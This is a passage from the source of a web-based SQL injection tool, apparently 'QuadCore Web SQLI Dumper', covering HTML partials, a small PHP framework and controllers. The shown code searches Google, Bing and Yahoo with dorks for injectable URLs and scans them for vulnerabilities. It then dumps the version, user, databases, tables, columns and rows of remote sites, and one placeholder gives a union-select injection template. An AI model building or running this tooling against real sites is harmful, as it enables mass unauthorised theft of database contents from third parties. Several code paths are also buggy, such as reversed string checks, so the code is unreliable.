22 |         </div>
23 |         <div ng-show="data_response.result">
24 |           <b>URL Target:</b> {{data_response.result.injection_point}}
25 |         </div>
26 |       <div class="panel panel-default" ng-show="data_response.result">
27 |         <div class="panel-heading">Result:</div>
28 |         <div class="panel-body">{{analyse.data}}</div>
29 |       </div>
30 |     </div>
31 | 
32 |   </div>
33 | 
34 | </div>
35 | 
36 | <script>
37 |   $('.tree').treeview();
38 | </script>
39 | 


--------------------------------------------------------------------------------
/app/partials/dumper.html:
--------------------------------------------------------------------------------
  1 | <div class="row spacer">
  2 | 
  3 |   <div class="col-lg-6 col-md-6 col-sm-4 col-xs-12">
  4 |     <div class="input-group">
  5 |       <input type="text" ng-model="dumper.url_point" class="form-control" placeholder="URL target builded: http://site.com/page.php?id=999999.9+union+all+select+1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17">
  6 |       <span class="input-group-btn">
  7 |         <button class="btn btn-primary" ng-click="start()" type="button">OK</button>
  8 |       </span>
  9 |     </div>
 10 | 
 11 |     <div class="panel panel-success spacer" ng-show="dumper">
 12 |         <div class="panel-heading">Infos Serveur</div>
 13 |         <div class="panel-body">
 14 |             <span>Version: <b>{{dumper.version}}</b></span>
 15 |             <br/>
 16 |             <span>User: <b>{{dumper.user}}</b></span>
 17 |             <br/>
 18 |             <span>IP: <b>{{dumper.ip}}</b></span>
 19 |             <br/>
 20 |         </div>
 21 |     </div>
 22 | 
 23 |     <!-- FOR DEBUG -->
 24 |     <!--<div class="panel" style="overflow-y:auto;max-height:200px;min-height:200px;">
 25 |         <p>{{dumper || Json}}</p>
 26 |     </div>-->
 27 | 
 28 |   </div>
 29 | 
 30 |   <div class="col-lg-6 col-md-6 col-sm-8 col-xs-12">
 31 |       <div class="panel panel-default">
 32 |           <div class="panel-heading" style="padding: 5px 15px; border-bottom: none;">
 33 |             <h4 style="margin-top:-10px;">Schéma
 34 |               <div class="form-group pull-right">
 35 |                   <button class="btn btn-primary btn-sm" ng-click="getDiagramMore('basededonne')">Get DB</button>
 36 |                   <button class="btn btn-primary btn-sm" ng-click="getDiagramMore('tables')">Get Tables</button>
 37 |                   <button class="btn btn-primary btn-sm" ng-click="getDiagramMore('colonnes')">Get Columns</button>
 38 |                   <button class="btn btn-success btn-sm" ng-click="getDumpData()">Get Datas</button>
 39 |               </div>
 40 |             </h4>
 41 |           </div>
 42 |           <div class="panel-body" style="overflow-y:auto;max-height:350px;min-height:350px;width:98%;">
 43 |             <span us-spinner spinner-key="spinner-2"></span>
 44 |             <ul class="tree" ng-controller="TreeviewController">
 45 | 
 46 |                <li ng-repeat="(db_k, db_v) in dumper.diagram">
 47 |                   <label><input type="checkbox" ng-click="onCheck(db_v)" ng-model="db_v.checked"/>{{db_v.name}}</label>
 48 |                   <ul>
 49 |                     <li ng-repeat="(tb_k, tb_v) in db_v.childs">
 50 |                       <label><input type="checkbox" ng-click="onCheck(tb_v)" ng-model="tb_v.checked"/>{{tb_v.name}}</label>
 51 |                       <ul>
 52 |                         <li ng-repeat="(cl_k, cl_v) in tb_v.childs"><label><input type="checkbox" ng-model="cl_v.checked"/>{{cl_v.name}}</label></li>
 53 |                       </ul>
 54 |                     </li>
 55 |                   </ul>
 56 |                </li>
 57 | 
 58 |             </ul>
 59 |           </div>
 60 |       </div>
 61 |   </div>
 62 | 
 63 | </div>
 64 | 
 65 | 
 66 | <div class="row">
 67 |   <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
 68 |     <div class="panel panel-default">
 69 | 
 70 |       <div class="panel-heading" style="padding: 5px 15px; border-bottom: none;">
 71 |         <h5>Data : <b>{{workspaces.length > 0 ? '(' + (workspaces.length - 1) + ' Work Space)' : ''}}</b> <span us-spinner spinner-key="spinner-3"></span> <button class="btn btn-danger btn-xs pull-right" ng-click="setCancel(true)" ng-show="!cancel">Cancel</button></h5>
 72 |       </div>
 73 | 
 74 |       <div class="panel-body">
 75 |         <span us-spinner spinner-key="spinner-3"></span>
 76 | 
 77 |         <!-- Workspaces nav -->
 78 |         <ul class="nav nav-tabs">
 79 |             <li role="presentation" ng-repeat="wk in workspaces" ng-class="{active: currentWorkspace==wk}" ng-show="wk.name != ''" ng-click="changeCurrentWorkspace(wk)">
 80 |               <a  style="cursor: pointer;">
 81 |                {{wk.name}} {{wk.row_count != null ? '(' + wk.data_rows.length + '/' + (wk.row_count) + ' rows)' : ''}}
 82 |                 <span style="cursor: pointer;" ng-click="deleteWk(wk)" class="glyphicon glyphicon-remove"></span>
 83 |               </a>
 84 |             </li>
 85 |         </ul>
 86 | 
 87 |         <!-- Workspaces containers -->
 88 |         <div class="workspaceContainer" ng-repeat="wk in workspaces" ng-show="currentWorkspace==wk">
 89 |             <table bs-table-control="wk.bsTableControl"></table>
 90 |         </div>
 91 | 
 92 |       </div>
 93 | 
 94 |     </div>
 95 | 
 96 |   </div>
 97 | </div>
 98 | 
 99 | <script>
100 |   $('.tree').treeview();
101 | </script>
102 | 


--------------------------------------------------------------------------------
/app/partials/recherche.html:
--------------------------------------------------------------------------------
 1 | <div class="row spacer">
 2 | 
 3 |     <div class="col-md-4 col-sm-12 col-xs-12">
 4 | 
 5 |         <div class="panel panel-primary">
 6 | 
 7 |             <div class="panel-heading"> </div>
 8 |             <div class="panel-body">
 9 | 
10 |                 <fieldset>
11 | 
12 |                     <div class="form-group">
13 |                         <div class="form-group">
14 |                             <textarea class="form-control" rows="5" ng-disabled="field_recherche" ng-model="recherche.dorks" placeholder="Dork exemple: page.php?id="></textarea>
15 |                             <br>
16 |                             <div class="form-group pull-right">
17 |                                 <input class="form-control" ng-model="recherche.page" type="number" min="1" max="100">
18 |                             </div>
19 |                         </div>
20 |                     </div>
21 | 
22 |                     <div class="form-group">
23 |                         <label>Search Engine :</label>
24 |                         <div class="checkbox"><label><input ng-model="recherche.chk_google" type="checkbox">Google</label></div>
25 |                         <div class="checkbox"><label><input ng-model="recherche.chk_bing" type="checkbox">Bing</label></div>
26 |                         <div class="checkbox"><label><input ng-model="recherche.chk_yahoo" type="checkbox">Yahoo</label></div>
27 |                     </div>
28 | 
29 |                     <div class="form-group">
30 |                         <label>Action :</label><br/>
31 |                         <button class="btn btn-primary" ng-click="export()">Export</button>
32 |                         <button class="btn btn-danger" ng-click="clear()">Clear</button>
33 |                     </div>
34 | 
35 |                     <div class="form-group text-center">
36 |                         <button class="btn btn-success btn-lg" ng-click="startRecherche()">Start</button>
37 |                     </div>
38 | 
39 |                 </fieldset>
40 | 
41 |             </div>
42 | 
43 |             <div class="panel">{{debug}}</div>
44 |             <br>
45 |             <div class="panel-footer"> </div>
46 | 
47 |         </div>
48 | 
49 |     </div>
50 | 
51 |     <div class="col-md-8 col-sm-12 col-xs-12" >
52 |         <div class="st-body-scroll" style="overflow-y: auto; max-height: 400px; padding-top:10px;">
53 |             <table class="scrollTable" cellpadding="0" cellspacing="0" border="0" >
54 |                 <thead>
55 |                     <tr><th>URL</th></tr>
56 |                 </thead>
57 |                 <tbody>
58 |                     <tr ng-repeat="url in urls"><td>{{url}}</td></tr>
59 |                 </tbody>
60 |             </table>
61 |         </div>
62 |     </div>
63 | 
64 | 
65 | </div>
66 | 


--------------------------------------------------------------------------------
/core/Controller.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class Controller
 3 | {
 4 |   public $request = false;
 5 |   private $rendered = false;
 6 | 	private $jsonRender = false;
 7 | 	public $vars = array();
 8 | 	public $layout = 'index';
 9 | 
10 | 	function __construct($request)
11 | 	{
12 |     $this->Session = new Session();
13 |     $this->request = $request;
14 |     require CORE.DS.'Hook.php';
15 | 	}
16 | 
17 |   public function set($keys, $value = null) {
18 | 		if (is_array($keys)) {
19 | 			$this->vars += $keys;
20 | 		} else {
21 | 			$this->vars[$keys] = $value;
22 | 		}
23 | 	}
24 | 
25 | 	function render($view = null){
26 | 	    if($this->rendered) {
27 | 	      	if ($this->jsonRender) {
28 | 		        echo json_encode($this->vars);
29 | 		        $this->jsonRender = true;
30 | 	      	}
31 | 	      	return false;
32 | 	    }
33 | 	    extract($this->vars);
34 | 	    ob_start('htmlCompress');
35 | 		require ROOT.DS.'app'.DS.$this->layout.'.php';
36 | 		$this->rendered = true;
37 | 	}
38 | 
39 | 	function error($message = 'Access Denied'){
40 | 		$this->set('errors', true);
41 | 		$this->set('message', $message);
42 | 		$this->render();
43 | 		die();
44 | 	}
45 | 
46 |   function checkPostField($fields, $createError = true){
47 | 		foreach ($fields as $k => $v) {
48 | 			if(!isset($_REQUEST[$v]) || empty($_REQUEST[$v])) {
49 | 				//print_r($_POST);
50 | 				if ($createError) {
51 | 					$this->error('Task aborted by Field Checker *_* No fields: ' . print_r($_REQUEST, true));
52 | 				}
53 | 				$this->render(null);
54 | 				exit;
55 | 				return false;
56 | 			}
57 | 		}
58 | 		return true;
59 | 	}
60 | 
61 | 	function checkGetField($fields, $createError = true){
62 | 		foreach ($fields as $k => $v) {
63 | 			if(!isset($_GET[$v]) || empty($_GET[$v])) {
64 | 				if ($createError) {
65 | 					$this->error('Task aborted by Field Checker *_*');
66 | 				}
67 | 				return false;
68 | 			}
69 | 		}
70 | 		return true;
71 | 	}
72 | 
73 | }
74 | function htmlCompress($html){
75 |     preg_match_all('!(<(?:code|pre).*>[^<]+</(?:code|pre)>)!',$html,$pre);
76 |     $html = preg_replace('!<(?:code|pre).*>[^<]+</(?:code|pre)>!', '#pre#', $html);
77 |     $html = preg_replace('#<!--[^\[].+-->#', '', $html);
78 |     $html = preg_replace('/[\r\n\t]+/', ' ', $html);
79 |     $html = preg_replace('/>[\s]+</', '><', $html);
80 |     $html = preg_replace('/[\s]+/', ' ', $html);
81 |     if(!empty($pre[0]))
82 |     foreach($pre[0] as $tag)
83 |     $html = preg_replace('!#pre#!', $tag, $html,1);
84 |     return $html;
85 | }
86 | 


--------------------------------------------------------------------------------
/core/Dispatcher.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | class Dispatcher
  3 | {
  4 | 	var $request;
  5 | 
  6 | 	function __construct()
  7 | 	{
  8 | 		$this->request = new stdClass();
  9 | 		$this->request->url = current(explode('?', $_SERVER['REQUEST_URI']));
 10 | 		$this->request->url = (BASE_URL == DS) ? $this->request->url : str_replace(BASE_URL , '',  $this->request->url);
 11 | 
 12 | 		if(!empty($_REQUEST)){
 13 | 			$this->request->data = new stdClass();
 14 | 			foreach ($_REQUEST as $k => $v) {
 15 | 				$this->request->data->$k = $v;
 16 | 			}
 17 | 		}
 18 | 
 19 | 		Router::parse($this->request->url, $this->request);
 20 | 		$controller = $this->loadController();
 21 | 		$action = $this->request->action;
 22 | 
 23 | 		if (!empty($this->request->controller)) {
 24 | 			if(!in_array($action, array_diff(get_class_methods($controller), get_class_methods('Controller')))){
 25 | 				header("HTTP/1.0 404 Not Found");
 26 | 				$this->error('Access Denied Not Found');
 27 | 				die('Controller: '.$this->request->controller.'<br> Not method: '. $action);
 28 | 			}
 29 | 			call_user_func_array(array($controller, $action), $this->request->params);
 30 | 			$controller->render($action);
 31 | 		}else{
 32 | 			$controller = new Controller($this->request);
 33 | 			$controller->redirect('home/index', 301);
 34 | 		}
 35 | 	}
 36 | 
 37 | 	function loadController() {
 38 | 		$name = ucfirst($this->request->controller).'Controller';
 39 | 		$file = ROOT.DS.'request'.DS.'controller'.DS.$name.'.php';
 40 | 		if (!file_exists($file)) {
 41 | 			die($file);
 42 | 		}
 43 | 		require $file;
 44 |     	$controller = new $name($this->request);
 45 | 
 46 | 		return $controller;
 47 | 	}
 48 | 
 49 | 
 50 | 	function redirect($url, $code = null){
 51 | 		if($code == 301){
 52 | 			header("HTTP/1.0 301 Moved Permanently");
 53 | 		}
 54 | 		header("Location: ".self::url($url));
 55 | 	}
 56 | 
 57 | 	function e404($message = 'Page Introuvable'){
 58 | 		header("HTTP/1.0 404 Not Found");
 59 | 		$controller = new Controller();
 60 | 		$this->controller->render('/errors/404');
 61 | 		die();
 62 | 	}
 63 | 
 64 | 	function error($message = 'Access Denied'){
 65 | 		echo json_encode(array('error' => true,'message' => $message));
 66 | 		exit;
 67 | 	}
 68 | }
 69 | 
 70 | class Router
 71 | {
 72 | 	static $routes = array();
 73 | 	static $prefixes = array();
 74 | 
 75 | 	static function prefix($url, $prefixe) {
 76 | 		self::$prefixes[$url] = $prefixe;
 77 | 	}
 78 | 
 79 | 	static function parse($url, $request){
 80 | 		$url = trim($url, '/');
 81 | 		if(empty($url)){
 82 | 			$url = Router::$routes[0]['url'];
 83 | 		}else{
 84 | 			$match = false;
 85 | 			foreach (Router::$routes as $v) {
 86 | 				if(!$match && preg_match($v['redirreg'], $url, $match)){
 87 | 					$url = $v['origin'];
 88 | 					foreach ($match as $k => $v) {
 89 | 						$url = str_replace(':'.$k, $v, $url);
 90 | 					}
 91 | 					$match = true;
 92 | 				}
 93 | 			}
 94 | 		}
 95 | 
 96 | 		$params = explode('/', $url);
 97 | 		if(in_array($params[0], array_keys(self::$prefixes))){
 98 | 			$request->prefix = self::$prefixes[$params[0]];
 99 | 			array_shift($params);
100 | 		}
101 | 		$request->controller = $params[0];
102 | 		$request->action = isset($params[1]) ? $params[1] : 'index';
103 | 		foreach (self::$prefixes as $k => $v) {
104 | 			if(strpos($request->action, $v.'_') === 0){
105 | 				$request->prefixes = $v;
106 | 				$request->action = str_replace($v.'_', '', $v);
107 | 			}
108 | 		}
109 | 		$request->params = array_slice($params, 2);
110 | 		return true;
111 | 	}
112 | 
113 | 	static function connect($redir, $url){
114 | 		$r = array();
115 | 		$r['params'] = array();
116 | 		$r['url'] = $url;
117 | 
118 | 		$r['originreg'] = preg_replace('/([a-z0-9]+):([^\/]+)/', '${1}:(?P<${1}>${2})', $url);
119 | 		$r['originreg'] = str_replace('/*', '(?P<args>/?.*)', $r['originreg']);
120 | 		$r['originreg'] = '/^' . str_replace('/', '\/', $r['originreg']) . '$/';
121 | 
122 | 		$r['origin'] = preg_replace('/([a-z0-9]+):([^\/]+)/', ':${1}', $url);
123 | 		$r['origin'] = str_replace('/*', ':args:', $r['origin']);
124 | 
125 | 		$params = explode('/', $url);
126 | 		foreach ($params as $k => $v) {
127 | 			if(strpos($v, ':')){
128 | 				$p = explode(':', $v);
129 | 				$r['params'][$p[0]] = $p[1];
130 | 			}
131 | 		}
132 | 
133 | 		$r['redirreg'] = $redir;
134 | 		$r['redirreg'] = str_replace('/*', '(?P<args>/?.*)', $r['redirreg']);
135 | 		foreach ($r['params'] as $k => $v) {
136 | 			$r['redirreg'] = str_replace(":$k" , "(?P<$k>$v)", $r['redirreg']);
137 | 		}
138 | 		$r['redirreg'] = '/^' . str_replace('/', '\/', $r['redirreg']) . '$/';
139 | 
140 | 		$r['redir'] = preg_replace('/:([a-z0-9]+)/', ':${1}:', $redir);
141 | 		$r['redir'] = str_replace('/*', ':args:', $r['redir']);
142 | 
143 | 		self::$routes[] = $r;
144 | 	}
145 | 
146 | 	static function url($url = ''){
147 | 		trim($url, '/');
148 | 		foreach (self::$routes as $v) {
149 | 			if(preg_match($v['originreg'], $url, $match)){
150 | 				$url = $v['redir'];
151 | 				foreach ($match as $k => $w) {
152 | 					$url = str_replace(":$k:", $w, $url);
153 | 				}
154 | 			}
155 | 		}
156 | 		foreach (self::$prefixes as $k => $v) {
157 | 			if(strpos($url, $v) === 0){
158 | 				$url = str_replace($v, $k, $url);
159 | 			}
160 | 		}
161 | 		return BASE_URL.'/'.$url;
162 | 	}
163 | 
164 | 	static function webroot($url){
165 | 		trim($url, '/');
166 | 		return BASE_URL.'/'.$url;
167 | 	}
168 | 
169 | }
170 | 


--------------------------------------------------------------------------------
/core/Hook.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 	if ($this->request->action != 'index') {
3 | 		$this->rendered = true;
4 | 		$this->jsonRender = true;
5 | 		header('Content-Type: application/json');
6 | 	}
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/core/Includer.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | 	require REQU.DS.'sql'.DS.'Includer.php';
4 | 	require 'Session.php';
5 | 	require 'Dispatcher.php';
6 | 	require 'Controller.php';
7 | 


--------------------------------------------------------------------------------
/core/Session.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class Session
 3 | {
 4 | 	function __construct(){
 5 | 		if(!isset($_SESSION)){
 6 | 			session_start();
 7 | 		}
 8 | 	}
 9 | 
10 | 	public function setFlash($message, $type = 'success', $title = ''){
11 | 		$_SESSION['flash'] = array(
12 | 			'title' => $title,
13 | 			'message' => $message,
14 | 			'type' => $type
15 | 		);
16 | 	}
17 | 
18 | 	public function flash(){
19 | 		if(isset($_SESSION['flash']['message'])){
20 | 			$html = '<div class="ui container">
21 | 				<div class="ui '.$_SESSION['flash']['type'].' message">
22 | 				    <div class="header">'.$_SESSION['flash']['title'].'</div>
23 | 				    <p>'.$_SESSION['flash']['message'].'</p>
24 | 				</div>
25 | 			</div><br/>';
26 | 			$_SESSION['flash'] = array();
27 | 			return $html;
28 | 		}
29 | 	}
30 | 
31 | 	public function write($key, $value = null){
32 | 		if (is_array($key)) {
33 | 			$_SESSION += $key;
34 | 		} else {
35 | 			$_SESSION[$key] = $value;
36 | 		}
37 | 	}
38 | 
39 | 	public function read($key = null) {
40 | 		if($key){
41 | 			if(isset($_SESSION[$key])){
42 | 				return $_SESSION[$key];
43 | 			} else {
44 | 				return false;
45 | 			}
46 | 		}else{
47 | 			return $_SESSION;
48 | 		}
49 | 	}
50 | 
51 | 	static function isLogged(){
52 | 		if(isset($_SESSION['User']->id)){
53 | 			return true;
54 | 		}else{
55 | 			return false;
56 | 		}
57 | 	}
58 | 
59 | }
60 | 


--------------------------------------------------------------------------------
/index.md:
--------------------------------------------------------------------------------
 1 | ## Welcome to GitHub Pages
 2 | 
 3 | You can use the [editor on GitHub](https://github.com/quadcoreside/QuadCore-Web-SQLI-Dumper/edit/master/index.md) to maintain and preview the content for your website in Markdown files.
 4 | 
 5 | Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files.
 6 | 
 7 | ### Markdown
 8 | 
 9 | Markdown is a lightweight and easy-to-use syntax for styling your writing. It includes conventions for
10 | 
11 | ```markdown
12 | Syntax highlighted code block
13 | 
14 | # Header 1
15 | ## Header 2
16 | ### Header 3
17 | 
18 | - Bulleted
19 | - List
20 | 
21 | 1. Numbered
22 | 2. List
23 | 
24 | **Bold** and _Italic_ and `Code` text
25 | 
26 | [Link](url) and ![Image](src)
27 | ```
28 | 
29 | For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/).
30 | 
31 | ### Jekyll Themes
32 | 
33 | Your Pages site will use the layout and styles from the Jekyll theme you have selected in your [repository settings](https://github.com/quadcoreside/QuadCore-Web-SQLI-Dumper/settings). The name of this theme is saved in the Jekyll `_config.yml` configuration file.
34 | 
35 | ### Support or Contact
36 | 
37 | Having trouble with Pages? Check out our [documentation](https://help.github.com/categories/github-pages-basics/) or [contact support](https://github.com/contact) and we’ll help you sort it out.
38 | 


--------------------------------------------------------------------------------
/request/SqlController.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | require_once ROOT.DS.'controller'.DS.'class'.DS.'sql'.DS.'Includer.php';
  3 | class SqlController extends Controller
  4 | {
  5 | 
  6 |   function index(){
  7 |     $this->initSessionVar();
  8 | 
  9 |   }
 10 | 
 11 |   protected function initSessionVar(){
 12 |     if ($this->Session->read('recherche_urls') == null) {
 13 |       $this->Session->write('recherche_urls', array());
 14 |     }
 15 |   }
 16 | 
 17 |   function get($name = null)
 18 |   {
 19 |     if ($name != null) {
 20 |       $d = array();
 21 | 
 22 |       switch ($name) {
 23 |         case 'recherche_urls':
 24 |           $d[$name] = $this->Session->read($name);
 25 |           break;
 26 |         
 27 |         default:
 28 |           $this->set(array('error' => 'Unknow'));
 29 |           break;
 30 |       }
 31 | 
 32 |     }else{
 33 |       $this->set(array('error' => 'kill (no param)'));
 34 |     }
 35 |   	
 36 |   }
 37 |   function get_all()
 38 |   {
 39 |     if ($name != null) {
 40 |       $a = json_encode($_SESSION);
 41 |       $this->set($a);
 42 |     }else{
 43 |       $this->set(array('error' => 'kill'));
 44 |     }
 45 |     
 46 |   }
 47 | 
 48 |   function start($what = null)
 49 |   {
 50 |     $d = array();
 51 |   	switch ($what) {
 52 |       case 'recherche':
 53 |         if($this->checkPostField(array('dork', 'page', 'engine'))){
 54 |           $dork = $this->request->data->dork;
 55 |           $page = $this->request->data->page;
 56 |           $engine = $this->request->data->engine;
 57 |           $sreach = new Rechercheur();
 58 |           $resultat = '';
 59 |           $page = (is_numeric($page)) ? intval($page) : 1;
 60 |           $moteurs = explode(';', $engine);
 61 | 
 62 |           if (in_array('google', $moteurs) && in_array('bing', $moteurs) && in_array('yahoo', $moteurs)){
 63 |             $resultat .= $sreach->allEngine($dork, $page);
 64 |           }else{
 65 |             if (in_array('google', $moteurs)){
 66 |               $resultat .= $sreach->google($dork, $page);
 67 |             }
 68 |             if (in_array('bing', $moteurs)){
 69 |               $resultat .= $sreach->bing($dork, $page);
 70 |             }
 71 |             if (in_array('yahoo', $moteurs)){
 72 |               $resultat .= $sreach->yahoo($dork, $page);
 73 |             }
 74 |           }
 75 | 
 76 |           $array_url_Ancien = $this->Session->read('recherche_urls');
 77 |           $array_url_New = explode("\r\n", $resultat);
 78 |           echo $resultat;
 79 |           $Array_Finale = array_unique(array_merge($array_url_Ancien, $array_url_New));
 80 |           $this->Session->write('recherche_urls', $Array_Finale);
 81 |         }else{
 82 |           echo "No fields" . print_r($_POST, true);
 83 |         }
 84 |         break;
 85 | 
 86 |       case 'scanne':
 87 |           $scn = new Scanneur();
 88 |           $array_A_Scanne = $this->Session->read('recherche_urls');
 89 |           $resultat = $scn->Scanne($array_A_Scanne);
 90 |           $array_url_Ancien = $this->Session->read('scanne_urls');
 91 |           $array_url_New = explode("\r\n", $resultat);
 92 |           $Array_Finale = array_unique(array_merge($array_url_Ancien, $array_url_New));
 93 |           $this->Session->write('scanne_urls', $Array_Finale);
 94 |         break;
 95 | 
 96 |       case 'analyse':
 97 |         if($this->checkPostField(array('url_point'))){
 98 |           $url_point = $this->request->data->url_point;
 99 |           if (strpos($url_point, "?") !== false && strpos($url_point, "=") !== false)
100 |           {
101 |             $inj = new sqli_inject();
102 |             $inj->Analyse($url_point);
103 |             $this->Session->write('url_analyse', $url_point);
104 |           }else{
105 |             $d['error'] = 'URL format incorecte';
106 |           }
107 |         }
108 |         break;
109 | 
110 |       case 'dump':
111 |         if($this->checkPostField(array('url_point'))){
112 |           $d = array();
113 |           $url_point = $this->request->data->url_point;
114 |           if (strpos("?", $url_point) !== false && strpos("=", $url_point) !== false && strpos("[t]", $url_point) !== false){
115 |             $this->Session->write('dump_url', $url_point);
116 |             $dmp = new sqli_dump();
117 |             if ($dmp->controlleur($url_point)){
118 |               $d['dump_infos'] = $this->Session->read('dump_infos');
119 |             }
120 |           }else{
121 |             $d['error'] = 'URL formt incorecte';
122 |           }
123 |         }
124 |         break;
125 |       
126 |       default:
127 |           $this->set(array('error' => 'kill'));
128 |         break;
129 |     }
130 |           $this->set($d);
131 |   }
132 | 
133 |   
134 | }
135 | 


--------------------------------------------------------------------------------
/request/action.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | session_start();
  3 | //ignore_user_abort(true);
  4 | //ini_set('max_execution_time', 0);
  5 | require_once 'scanneur_class.php';
  6 | 
  7 | if(!isset($_SESSION["url_trouver"]))
  8 | {
  9 | 	$_SESSION["url_trouver"] = array();
 10 | }
 11 | if(!isset($_SESSION["url_vulne"]))
 12 | {
 13 | 	$_SESSION["url_vulne"] = array();
 14 | }
 15 | if(!isset($_SESSION["obj_dump"]))
 16 | {
 17 | 	$_SESSION["obj_dump"] = new sqli_dump();
 18 | }
 19 | 
 20 | $dmp = $_SESSION["obj_dump"];
 21 | 
 22 |  if(isset($_GET["demmarer"]))
 23 | {
 24 | 	if ($_GET["demmarer"] == 'recherche' && isset($_GET["dork"]) && isset($_GET["page"]) && isset($_GET["moteur"])
 25 | 		&& !empty($_GET["dork"]) && !empty($_GET["page"]) && !empty($_GET["moteur"]))
 26 | 	{
 27 | 		$dork = $_GET['dork'];
 28 | 		$page = $_GET['page'];
 29 | 		$resultat = "";
 30 | 		$sreach = new Rechercheur();
 31 | 		if(!is_numeric($page)) { $page = 1; } else { $page = intval($page); }
 32 | 		$moteurs = explode(';', $_GET["moteur"]);
 33 | 		if (in_array("google", $moteurs) && in_array("bing", $moteurs) && in_array("yahoo", $moteurs))
 34 | 		{
 35 | 			$resultat .= $sreach->allEngine($dork, $page);
 36 | 			$moteurs = array();
 37 | 		}
 38 | 		if (in_array("google", $moteurs))
 39 | 		{
 40 | 			$resultat .= $sreach->google($dork, $page);
 41 | 		}
 42 | 		if (in_array("bing", $moteurs))
 43 | 		{
 44 | 			$resultat .= $sreach->bing($dork, $page);
 45 | 		}
 46 | 		if (in_array("yahoo", $moteurs))
 47 | 		{
 48 | 			$resultat .= $sreach->yahoo($dork, $page);
 49 | 		}
 50 | 		$array_url_Ancien = $_SESSION["url_trouver"];
 51 | 		$array_url_New = explode("\r\n", $resultat);
 52 | 	  $Array_Finale = array_unique(array_merge($array_url_Ancien, $array_url_New));
 53 | 		$_SESSION["url_trouver"] = $Array_Finale;
 54 | 	}
 55 | 	else if($_GET["demmarer"] == 'scanne')
 56 | 	{
 57 | 		$scn = new Scanneur();
 58 | 		$array_A_Scanne = $_SESSION["url_trouver"];
 59 | 		$resultat = $scn->Scanne($array_A_Scanne);
 60 | 		$array_url_Ancien = $_SESSION["url_vulne"];
 61 | 		$array_url_New = explode("\r\n", $resultat);
 62 | 	  $Array_Finale = array_unique(array_merge($array_url_Ancien, $array_url_New));
 63 | 		$_SESSION["url_vulne"] = $Array_Finale;
 64 | 	}
 65 | 
 66 | 	else if($_GET["demmarer"] == 'analyse-url')
 67 | 	{
 68 | 		if(isset($_GET["url"]))
 69 | 		{
 70 | 			$url = $_GET["url"];
 71 |             if (strpos($url, "?") !== false && strpos($url, "=") !== false)
 72 |             {
 73 |         				$inj = new sqli_inject();
 74 |                 $inj->Analyse($url);
 75 |                 $_SESSION["url_analyse"] = $url;
 76 |             }
 77 |             else
 78 |             {
 79 |                 $_SESSION["erreur"] = "URL format incorecte";
 80 |                 echo "URL format incorecte";
 81 |             }
 82 | 		}
 83 | 		else
 84 | 		{
 85 | 			echo "No POST";
 86 | 		}
 87 | 	}
 88 | }
 89 | 
 90 | else if(isset($_GET["dump"]))
 91 | {
 92 | 	if($_GET["dump"] == 'start') {
 93 | 		if(isset($_GET["url"]))
 94 | 		{
 95 |             $url = $_GET["url"];
 96 |             if (strpos("?", $url) !== false && strpos("=", $url) !== false && strpos("[t]", $url) !== false)
 97 |             {
 98 |             	$_SESSION["url_dump"] = $_GET["url"];
 99 |                 $dmp = new sqli_dump();
100 |                 if ($dmp->controlleur($url))
101 |                 {
102 |                 	echo $_SESSION["analyse_infos"];
103 |                     echo "OK";
104 |                 }
105 |             }
106 |             else
107 |             {
108 |             	$_SESSION["erreur"] = "URL format incorecte";
109 |             }
110 | 		} else { echo "No GET"; }
111 | 	}
112 | 	else if ($_GET["dump"] == 'get_inf') {
113 | 		if(isset($_SESSION["analyse_infos"]))
114 | 		{
115 | 			echo $_SESSION["analyse_infos"];
116 | 		}
117 | 	}
118 | 	else if($_GET["dump"] == 'get_db') {
119 | 		if(isset($_SESSION["basededonnes"])){
120 | 			$_SESSION["basededonnes"] = "";
121 | 			$dmp->setAllBD();
122 | 		}
123 | 	}
124 | 	else if($_GET["dump"] == 'get_tables') {
125 | 		if(isset($_GET["db_name"]))
126 | 		{
127 |             $_SESSION["tables"] = "";
128 |             $dmp->setTable($_GET["db_name"]);
129 | 		}
130 | 	}
131 | 	else if($_GET["dump"] == 'get_colonnes') {
132 | 		if(isset($_POST["db_name"]) && isset($_POST["table_name"]))
133 | 		{
134 |             $_SESSION["colonnes"] = "";
135 |             $dmp->setColonne($_POST["db_name"], $_POST["table_name"]);
136 | 		}
137 | 	}
138 | }
139 | 
140 | else if(isset($_GET["exporter"]))
141 | {
142 | 	if($_GET["exporter"] == 'url_trouver') {
143 | 		$arr = $_SESSION["url_trouver"];
144 | 		$Listeurls = "";
145 | 		foreach($arr as $elmt) {
146 | 			if(!empty($elmt))
147 | 				$Listeurls .= $elmt."\r\n";
148 | 		}
149 | 		$fichier = 'urls_quadcore_'.$_SESSION["nomutilisateur"].'.txt';
150 | 		$handle = fopen($fichier, "w");
151 | 		fwrite($handle, $Listeurls);
152 | 		fclose($handle);
153 | 		header('Content-type: text/plain');
154 | 		header('Content-Length: '.filesize($fichier));
155 | 		header('Content-Disposition: attachment; filename='.$fichier);
156 | 		readfile($fichier);
157 | 		unlink($fichier);
158 | 	}
159 | 	else if($_GET["exporter"] == 'url_vulne') {
160 | 		$arr = $_SESSION["url_vulne"];
161 | 		$Listeurls = "";
162 | 		foreach($arr as $elmt) {
163 | 			if(!empty($elmt))
164 | 				$Listeurls .= $elmt."\r\n";
165 | 		}
166 | 		$fichier = 'urls_quadcore_'.$_SESSION["nomutilisateur"].'.txt';
167 | 		$handle = fopen($fichier, "w");
168 | 		fwrite($handle, $Listeurls);
169 | 		fclose($handle);
170 | 		header('Content-type: text/plain');
171 | 		header('Content-Length: '.filesize($fichier));
172 | 		header('Content-Disposition: attachment; filename='.$fichier);
173 | 		readfile($fichier);
174 | 		unlink($fichier);
175 | 	}
176 | }
177 | 
178 | else if(isset($_GET["nettoyer"]))
179 | {
180 | 	if($_GET["nettoyer"] == 'url') {
181 | 		$_SESSION["url_trouver"] = array();
182 | 	}
183 | 	else if($_GET["nettoyer"] == 'url_vulne') {
